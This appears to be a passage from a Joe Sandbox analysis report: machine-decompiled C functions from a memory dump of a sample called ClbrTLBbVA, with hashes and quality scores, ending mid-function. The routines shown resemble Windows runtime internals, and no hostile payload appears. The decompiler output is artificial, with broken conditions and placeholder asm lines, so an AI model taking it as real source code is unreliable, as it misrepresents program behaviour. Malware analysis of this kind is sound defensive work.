                                        • Instruction ID: aa4192aa409898f3102ab056dd7732816c79263b8fb4cb56d1a7a3c9f68c3a38
                                        • Opcode Fuzzy Hash: 291d00e327f000677985d9332a899b9e898e70f8b1b7a57ef01373a2b92a18cc
                                        • Instruction Fuzzy Hash: 2351BAB0105342ABD722EF28CC44B67BBE5FF54720F14491EF49A87691E770E845CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E016BEF40(intOrPtr __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				char _v7;
                                        				char _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t58;
                                        				char _t59;
                                        				signed char _t69;
                                        				void* _t73;
                                        				signed int _t74;
                                        				char _t79;
                                        				signed char _t81;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				intOrPtr _t90;
                                        				signed char* _t91;
                                        				void* _t92;
                                        				signed int _t94;
                                        				void* _t96;
                                        
                                        				_t90 = __ecx;
                                        				_v16 = __ecx;
                                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                        					_t58 =  *((intOrPtr*)(__ecx));
                                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                        						E016A9080(_t73, __ecx, __ecx, _t92);
                                        					}
                                        				}
                                        				_t74 = 0;
                                        				_t96 =  *0x7ffe036a - 1;
                                        				_v12 = 0;
                                        				_v7 = 0;
                                        				if(_t96 > 0) {
                                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                        					_v12 = _t74;
                                        					_v7 = _t96 != 0;
                                        				}
                                        				_t79 = 0;
                                        				_v8 = 0;
                                        				_v5 = 0;
                                        				while(1) {
                                        					L4:
                                        					_t59 = 1;
                                        					L5:
                                        					while(1) {
                                        						if(_t59 == 0) {
                                        							L12:
                                        							_t21 = _t90 + 4; // 0x7788c21e
                                        							_t87 =  *_t21;
                                        							_v6 = 0;
                                        							if(_t79 != 0) {
                                        								if((_t87 & 0x00000002) != 0) {
                                        									goto L19;
                                        								}
                                        								if((_t87 & 0x00000001) != 0) {
                                        									_v6 = 1;
                                        									_t74 = _t87 ^ 0x00000003;
                                        								} else {
                                        									_t51 = _t87 - 2; // -2
                                        									_t74 = _t51;
                                        								}
                                        								goto L15;
                                        							} else {
                                        								if((_t87 & 0x00000001) != 0) {
                                        									_v6 = 1;
                                        									_t74 = _t87 ^ 0x00000001;
                                        								} else {
                                        									_t26 = _t87 - 4; // -4
                                        									_t74 = _t26;
                                        									if((_t74 & 0x00000002) == 0) {
                                        										_t74 = _t74 - 2;
                                        									}
                                        								}
                                        								L15:
                                        								if(_t74 == _t87) {
                                        									L19:
                                        									E016A2D8A(_t74, _t90, _t87, _t90);
                                        									_t74 = _v12;
                                        									_v8 = 1;
                                        									if(_v7 != 0 && _t74 > 0x64) {
                                        										_t74 = _t74 - 1;
                                        										_v12 = _t74;
                                        									}
                                        									_t79 = _v5;
                                        									goto L4;
                                        								}
                                        								asm("lock cmpxchg [esi], ecx");
                                        								if(_t87 != _t87) {
                                        									_t74 = _v12;
                                        									_t59 = 0;
                                        									_t79 = _v5;
                                        									continue;
                                        								}
                                        								if(_v6 != 0) {
                                        									_t74 = _v12;
                                        									L25:
                                        									if(_v7 != 0) {
                                        										if(_t74 < 0x7d0) {
                                        											if(_v8 == 0) {
                                        												_t74 = _t74 + 1;
                                        											}
                                        										}
                                        										_t38 = _t90 + 0x14; // 0x0
                                        										_t39 = _t90 + 0x14; // 0x0
                                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                        											_t85 = _t85 & 0xff000000;
                                        										}
                                        										 *(_t90 + 0x14) = _t85;
                                        									}
                                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                                        									return 0;
                                        								}
                                        								_v5 = 1;
                                        								_t87 = _t74;
                                        								goto L19;
                                        							}
                                        						}
                                        						_t94 = _t74;
                                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                        						if(_t74 == 0) {
                                        							goto L12;
                                        						} else {
                                        							_t91 = _t90 + 4;
                                        							goto L8;
                                        							L9:
                                        							while((_t81 & 0x00000001) != 0) {
                                        								_t69 = _t81;
                                        								asm("lock cmpxchg [edi], edx");
                                        								if(_t69 != _t81) {
                                        									_t81 = _t69;
                                        									continue;
                                        								}
                                        								_t90 = _v16;
                                        								goto L25;
                                        							}
                                        							asm("pause");
                                        							_t94 = _t94 - 1;
                                        							if(_t94 != 0) {
                                        								L8:
                                        								_t81 =  *_t91;
                                        								goto L9;
                                        							} else {
                                        								_t90 = _v16;
                                        								_t79 = _v5;
                                        								goto L12;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}





























                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction ID: b81579fc33d12fa6cff54c4201c715e5ede8c70cf98d1bd059470c7afd214e62
                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction Fuzzy Hash: D351C030E04649DBEB25CB6CC8E0BEEBBF1AF05314F1881A8D545973A2C376A9C9C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0177740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                        				signed short* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _t55;
                                        				void* _t56;
                                        				intOrPtr* _t66;
                                        				intOrPtr* _t69;
                                        				void* _t74;
                                        				intOrPtr* _t78;
                                        				intOrPtr* _t81;
                                        				intOrPtr* _t82;
                                        				intOrPtr _t83;
                                        				signed short* _t84;
                                        				intOrPtr _t85;
                                        				signed int _t87;
                                        				intOrPtr* _t90;
                                        				intOrPtr* _t93;
                                        				intOrPtr* _t94;
                                        				void* _t98;
                                        
                                        				_t84 = __edx;
                                        				_t80 = __ecx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t55 = __ecx;
                                        				_v8 = __edx;
                                        				_t87 =  *__edx & 0x0000ffff;
                                        				_v12 = __ecx;
                                        				_t3 = _t55 + 0x154; // 0x154
                                        				_t93 = _t3;
                                        				_t78 =  *_t93;
                                        				_t4 = _t87 + 2; // 0x2
                                        				_t56 = _t4;
                                        				while(_t78 != _t93) {
                                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                        						L4:
                                        						_t78 =  *_t78;
                                        						continue;
                                        					} else {
                                        						_t7 = _t78 + 0x18; // 0x18
                                        						if(E016FD4F0(_t7, _t84[2], _t87) == _t87) {
                                        							_t40 = _t78 + 0xc; // 0xc
                                        							_t94 = _t40;
                                        							_t90 =  *_t94;
                                        							while(_t90 != _t94) {
                                        								_t41 = _t90 + 8; // 0x8
                                        								_t74 = E016EF380(_a4, _t41, 0x10);
                                        								_t98 = _t98 + 0xc;
                                        								if(_t74 != 0) {
                                        									_t90 =  *_t90;
                                        									continue;
                                        								}
                                        								goto L12;
                                        							}
                                        							_t82 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                        							if(_t82 != 0) {
                                        								_t46 = _t78 + 0xc; // 0xc
                                        								_t69 = _t46;
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								_t85 =  *_t69;
                                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        									L20:
                                        									_t82 = 3;
                                        									asm("int 0x29");
                                        								}
                                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                        								 *_t82 = _t85;
                                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                        								 *_t69 = _t82;
                                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                        								goto L11;
                                        							} else {
                                        								L18:
                                        								_push(0xe);
                                        								_pop(0);
                                        							}
                                        						} else {
                                        							_t84 = _v8;
                                        							_t9 = _t87 + 2; // 0x2
                                        							_t56 = _t9;
                                        							goto L4;
                                        						}
                                        					}
                                        					L12:
                                        					return 0;
                                        				}
                                        				_t10 = _t87 + 0x1a; // 0x1a
                                        				_t78 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                        				if(_t78 == 0) {
                                        					goto L18;
                                        				} else {
                                        					_t12 = _t87 + 2; // 0x2
                                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                        					_t16 = _t78 + 0x18; // 0x18
                                        					E016EF3E0(_t16, _v8[2], _t87);
                                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                        					_t19 = _t78 + 0xc; // 0xc
                                        					_t66 = _t19;
                                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                        					 *_t66 = _t66;
                                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                        					_t81 = L016C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                        					if(_t81 == 0) {
                                        						goto L18;
                                        					} else {
                                        						_t26 = _t78 + 0xc; // 0xc
                                        						_t69 = _t26;
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						_t85 =  *_t69;
                                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        							goto L20;
                                        						} else {
                                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                        							 *_t81 = _t85;
                                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                        							 *_t69 = _t81;
                                        							_t83 = _v12;
                                        							 *(_t78 + 8) = 1;
                                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                        							_t34 = _t83 + 0x154; // 0x1ba
                                        							_t69 = _t34;
                                        							_t85 =  *_t69;
                                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        								goto L20;
                                        							} else {
                                        								 *_t78 = _t85;
                                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                        								 *_t69 = _t78;
                                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                        							}
                                        						}
                                        						goto L11;
                                        					}
                                        				}
                                        				goto L12;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction ID: 761723e742357b5ea7789f2b3294f9ed2b46e91e964bd68e9d160828f7f5b457
                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction Fuzzy Hash: 0A517B71600646EFDB1ACF18C884A96FBB5FF45704F24C1AAE9089F212E771E946CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E016D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v176;
                                        				char _v177;
                                        				char _v184;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed short _t42;
                                        				char* _t44;
                                        				intOrPtr _t46;
                                        				intOrPtr _t50;
                                        				char* _t57;
                                        				intOrPtr _t59;
                                        				intOrPtr _t67;
                                        				signed int _t69;
                                        
                                        				_t64 = __edx;
                                        				_v12 =  *0x179d360 ^ _t69;
                                        				_t65 = 0xa0;
                                        				_v196 = __edx;
                                        				_v177 = 0;
                                        				_t67 = __ecx;
                                        				_v192 = __ecx;
                                        				E016EFA60( &_v176, 0, 0xa0);
                                        				_t57 =  &_v176;
                                        				_t59 = 0xa0;
                                        				if( *0x1797bc8 != 0) {
                                        					L3:
                                        					while(1) {
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						_t67 = _v192;
                                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                        						_push( &_v184);
                                        						_push(_t59);
                                        						_push(_t57);
                                        						_push(0xa0);
                                        						_push(_t57);
                                        						_push(0xf);
                                        						_t42 = E016EB0B0();
                                        						if(_t42 != 0xc0000023) {
                                        							break;
                                        						}
                                        						if(_v177 != 0) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                        						}
                                        						_v177 = 1;
                                        						_t44 = L016C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                        						_t59 = _v184;
                                        						_t57 = _t44;
                                        						if(_t57 != 0) {
                                        							continue;
                                        						} else {
                                        							_t42 = 0xc0000017;
                                        							break;
                                        						}
                                        					}
                                        					if(_t42 != 0) {
                                        						_t65 = E016ACCC0(_t42);
                                        						if(_t65 != 0) {
                                        							L10:
                                        							if(_v177 != 0) {
                                        								if(_t57 != 0) {
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                        								}
                                        							}
                                        							_t46 = _t65;
                                        							L12:
                                        							return E016EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                        						}
                                        						L7:
                                        						_t50 = _a4;
                                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                        						if(_t50 != 3) {
                                        							if(_t50 == 2) {
                                        								goto L8;
                                        							}
                                        							L9:
                                        							if(E016EF380(_t67 + 0xc, 0x1685138, 0x10) == 0) {
                                        								 *0x17960d8 = _t67;
                                        							}
                                        							goto L10;
                                        						}
                                        						L8:
                                        						_t64 = _t57 + 0x28;
                                        						E016D4F49(_t67, _t57 + 0x28);
                                        						goto L9;
                                        					}
                                        					_t65 = 0;
                                        					goto L7;
                                        				}
                                        				if(E016D4E70(0x17986b0, 0x16d5690, 0, 0) != 0) {
                                        					_t46 = E016ACCC0(_t56);
                                        					goto L12;
                                        				} else {
                                        					_t59 = 0xa0;
                                        					goto L3;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5bc37d1f1b729abe4cdc5e3892cf316b54ebf75924a52b0f0de3f8091014ed1
                                        • Instruction ID: c4b63e9e99944454da5d83b67a8fbe13a467be4b59c88437197870be8fa0e34d
                                        • Opcode Fuzzy Hash: c5bc37d1f1b729abe4cdc5e3892cf316b54ebf75924a52b0f0de3f8091014ed1
                                        • Instruction Fuzzy Hash: F141D371E44318AFEB32DF18CC84FAAB7AAEB54610F004199E9459B681DBB0ED44CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E016B8A0A(intOrPtr* __ecx, signed int __edx) {
                                        				signed int _v8;
                                        				char _v524;
                                        				signed int _v528;
                                        				void* _v532;
                                        				char _v536;
                                        				char _v540;
                                        				char _v544;
                                        				intOrPtr* _v548;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t44;
                                        				void* _t46;
                                        				void* _t48;
                                        				signed int _t53;
                                        				signed int _t55;
                                        				intOrPtr* _t62;
                                        				void* _t63;
                                        				unsigned int _t75;
                                        				signed int _t79;
                                        				unsigned int _t81;
                                        				unsigned int _t83;
                                        				signed int _t84;
                                        				void* _t87;
                                        
                                        				_t76 = __edx;
                                        				_v8 =  *0x179d360 ^ _t84;
                                        				_v536 = 0x200;
                                        				_t79 = 0;
                                        				_v548 = __edx;
                                        				_v544 = 0;
                                        				_t62 = __ecx;
                                        				_v540 = 0;
                                        				_v532 =  &_v524;
                                        				if(__edx == 0 || __ecx == 0) {
                                        					L6:
                                        					return E016EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                        				} else {
                                        					_v528 = 0;
                                        					E016BE9C0(1, __ecx, 0, 0,  &_v528);
                                        					_t44 = _v528;
                                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                        					_t46 = 0xa;
                                        					_t87 = _t81 - _t46;
                                        					if(_t87 > 0 || _t87 == 0) {
                                        						 *_v548 = 0x1681180;
                                        						L5:
                                        						_t79 = 1;
                                        						goto L6;
                                        					} else {
                                        						_t48 = E016D1DB5(_t62,  &_v532,  &_v536);
                                        						_t76 = _v528;
                                        						if(_t48 == 0) {
                                        							L9:
                                        							E016E3C2A(_t81, _t76,  &_v544);
                                        							 *_v548 = _v544;
                                        							goto L5;
                                        						}
                                        						_t62 = _v532;
                                        						if(_t62 != 0) {
                                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                        							_t53 =  *_t62;
                                        							_v528 = _t53;
                                        							if(_t53 != 0) {
                                        								_t63 = _t62 + 4;
                                        								_t55 = _v528;
                                        								do {
                                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                        										if(E016B8999(_t63,  &_v540) == 0) {
                                        											_t55 = _v528;
                                        										} else {
                                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                        											_t55 = _v528;
                                        											if(_t75 >= _t83) {
                                        												_t83 = _t75;
                                        											}
                                        										}
                                        									}
                                        									_t63 = _t63 + 0x14;
                                        									_t55 = _t55 - 1;
                                        									_v528 = _t55;
                                        								} while (_t55 != 0);
                                        								_t62 = _v532;
                                        							}
                                        							if(_t62 !=  &_v524) {
                                        								L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                        							}
                                        							_t76 = _t83 & 0x0000ffff;
                                        							_t81 = _t83 >> 0x10;
                                        						}
                                        						goto L9;
                                        					}
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: deb49d8e353ae66c679c5a3f0d73fb279272d14ad53d44e60967e6c47ee57cd1
                                        • Instruction ID: 8bc7052e4e4acb8e5fd46dd8ac3a788fcec21e45163b6794804ad5b1e0dd260f
                                        • Opcode Fuzzy Hash: deb49d8e353ae66c679c5a3f0d73fb279272d14ad53d44e60967e6c47ee57cd1
                                        • Instruction Fuzzy Hash: C8415CB0A402299BDB24DF69CCC8AEAB7BDFB54300F1041E9D91997342E7709E81CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E017269A6(signed short* __ecx, void* __eflags) {
                                        				signed int _v8;
                                        				signed int _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				signed short _v28;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				char* _v44;
                                        				signed int _v48;
                                        				intOrPtr _v52;
                                        				signed int _v56;
                                        				char _v60;
                                        				signed int _v64;
                                        				char _v68;
                                        				char _v72;
                                        				signed short* _v76;
                                        				signed int _v80;
                                        				char _v84;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t68;
                                        				intOrPtr _t73;
                                        				signed short* _t74;
                                        				void* _t77;
                                        				void* _t78;
                                        				signed int _t79;
                                        				signed int _t80;
                                        
                                        				_v8 =  *0x179d360 ^ _t80;
                                        				_t75 = 0x100;
                                        				_v64 = _v64 & 0x00000000;
                                        				_v76 = __ecx;
                                        				_t79 = 0;
                                        				_t68 = 0;
                                        				_v72 = 1;
                                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                        				_t77 = 0;
                                        				if(L016B6C59(__ecx[2], 0x100, __eflags) != 0) {
                                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                        					if(_t79 != 0 && E01726BA3() != 0) {
                                        						_push(0);
                                        						_push(0);
                                        						_push(0);
                                        						_push(0x1f0003);
                                        						_push( &_v64);
                                        						if(E016E9980() >= 0) {
                                        							E016C2280(_t56, 0x1798778);
                                        							_t77 = 1;
                                        							_t68 = 1;
                                        							if( *0x1798774 == 0) {
                                        								asm("cdq");
                                        								 *(_t79 + 0xf70) = _v64;
                                        								 *(_t79 + 0xf74) = 0x100;
                                        								_t75 = 0;
                                        								_t73 = 4;
                                        								_v60 =  &_v68;
                                        								_v52 = _t73;
                                        								_v36 = _t73;
                                        								_t74 = _v76;
                                        								_v44 =  &_v72;
                                        								 *0x1798774 = 1;
                                        								_v56 = 0;
                                        								_v28 = _t74[2];
                                        								_v48 = 0;
                                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                        								_v40 = 0;
                                        								_v32 = 0;
                                        								_v24 = 0;
                                        								_v16 = 0;
                                        								if(E016AB6F0(0x168c338, 0x168c288, 3,  &_v60) == 0) {
                                        									_v80 = _v80 | 0xffffffff;
                                        									_push( &_v84);
                                        									_push(0);
                                        									_push(_v64);
                                        									_v84 = 0xfa0a1f00;
                                        									E016E9520();
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				if(_v64 != 0) {
                                        					_push(_v64);
                                        					E016E95D0();
                                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                        				}
                                        				if(_t77 != 0) {
                                        					E016BFFB0(_t68, _t77, 0x1798778);
                                        				}
                                        				_pop(_t78);
                                        				return E016EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ed390fee67697be4b9a061b6ab75074e697102a787bde48dfbe674bf5ce5605
                                        • Instruction ID: c2903739b74e256553afc23da6aba79c1f1b8480535d06505fc5fc16b4da4c7d
                                        • Opcode Fuzzy Hash: 7ed390fee67697be4b9a061b6ab75074e697102a787bde48dfbe674bf5ce5605
                                        • Instruction Fuzzy Hash: 454179B1D01219AFDB24DFA9D940BEEFBF9EF48714F14812EE915A3240DB709906CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E016E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				signed short** _t33;
                                        				short* _t38;
                                        				intOrPtr* _t39;
                                        				intOrPtr* _t41;
                                        				signed short _t43;
                                        				intOrPtr* _t47;
                                        				intOrPtr* _t53;
                                        				signed short _t57;
                                        				intOrPtr _t58;
                                        				signed short _t60;
                                        				signed short* _t61;
                                        
                                        				_t47 = __ecx;
                                        				_t61 = __edx;
                                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                        				if(_t60 > 0xfffe) {
                                        					L22:
                                        					return 0xc0000106;
                                        				}
                                        				if(__edx != 0) {
                                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                        						L5:
                                        						E016B7B60(0, _t61, 0x16811c4);
                                        						_v12 =  *_t47;
                                        						_v12 = _v12 + 0xfff8;
                                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                        						E016B7B60(0xfff8, _t61,  &_v12);
                                        						_t33 = _a8;
                                        						if(_t33 != 0) {
                                        							 *_t33 = _t61;
                                        						}
                                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                        						_t53 = _a12;
                                        						if(_t53 != 0) {
                                        							_t57 = _t61[2];
                                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                        							while(_t38 >= _t57) {
                                        								if( *_t38 == 0x5c) {
                                        									_t41 = _t38 + 2;
                                        									if(_t41 == 0) {
                                        										break;
                                        									}
                                        									_t58 = 0;
                                        									if( *_t41 == 0) {
                                        										L19:
                                        										 *_t53 = _t58;
                                        										goto L7;
                                        									}
                                        									 *_t53 = _t41;
                                        									goto L7;
                                        								}
                                        								_t38 = _t38 - 2;
                                        							}
                                        							_t58 = 0;
                                        							goto L19;
                                        						} else {
                                        							L7:
                                        							_t39 = _a16;
                                        							if(_t39 != 0) {
                                        								 *_t39 = 0;
                                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                        							}
                                        							return 0;
                                        						}
                                        					}
                                        					_t61 = _a4;
                                        					if(_t61 != 0) {
                                        						L3:
                                        						_t43 = L016C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                        						_t61[2] = _t43;
                                        						if(_t43 == 0) {
                                        							return 0xc0000017;
                                        						}
                                        						_t61[1] = _t60;
                                        						 *_t61 = 0;
                                        						goto L5;
                                        					}
                                        					goto L22;
                                        				}
                                        				_t61 = _a4;
                                        				if(_t61 == 0) {
                                        					return 0xc000000d;
                                        				}
                                        				goto L3;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 221d8f829ed9b52ff5c09f87cb9dbc026fc27620ac2a9c28b835d25a8c427ef1
                                        • Instruction ID: 5655c6dbf2fe3257826e751c66cbc270b1ed0502fbca60f8cc2b8a00470675a3
                                        • Opcode Fuzzy Hash: 221d8f829ed9b52ff5c09f87cb9dbc026fc27620ac2a9c28b835d25a8c427ef1
                                        • Instruction Fuzzy Hash: BD31D032A02615DBD7258F2ECC49A7ABBF5FF85700B05816EE945CB360EB31D841C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E016DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t35;
                                        				intOrPtr _t39;
                                        				intOrPtr _t45;
                                        				intOrPtr* _t51;
                                        				intOrPtr* _t52;
                                        				intOrPtr* _t55;
                                        				signed int _t57;
                                        				intOrPtr* _t59;
                                        				intOrPtr _t68;
                                        				intOrPtr* _t77;
                                        				void* _t79;
                                        				signed int _t80;
                                        				intOrPtr _t81;
                                        				char* _t82;
                                        				void* _t83;
                                        
                                        				_push(0x24);
                                        				_push(0x1780220);
                                        				E016FD08C(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                        				_t79 = __ecx;
                                        				_t35 =  *0x1797b9c; // 0x0
                                        				_t55 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                        				if(_t55 == 0) {
                                        					_t39 = 0xc0000017;
                                        					L11:
                                        					return E016FD0D1(_t39);
                                        				}
                                        				_t68 = 0;
                                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                        				_t7 = _t55 + 8; // 0x8
                                        				_t57 = 6;
                                        				memcpy(_t7, _t79, _t57 << 2);
                                        				_t80 = 0xfffffffe;
                                        				 *(_t83 - 4) = _t80;
                                        				if(0 < 0) {
                                        					L14:
                                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                        					L20:
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                        					_t39 = _t81;
                                        					goto L11;
                                        				}
                                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                        					_t81 = 0xc000007b;
                                        					goto L20;
                                        				}
                                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                                        					_t45 =  *_t59;
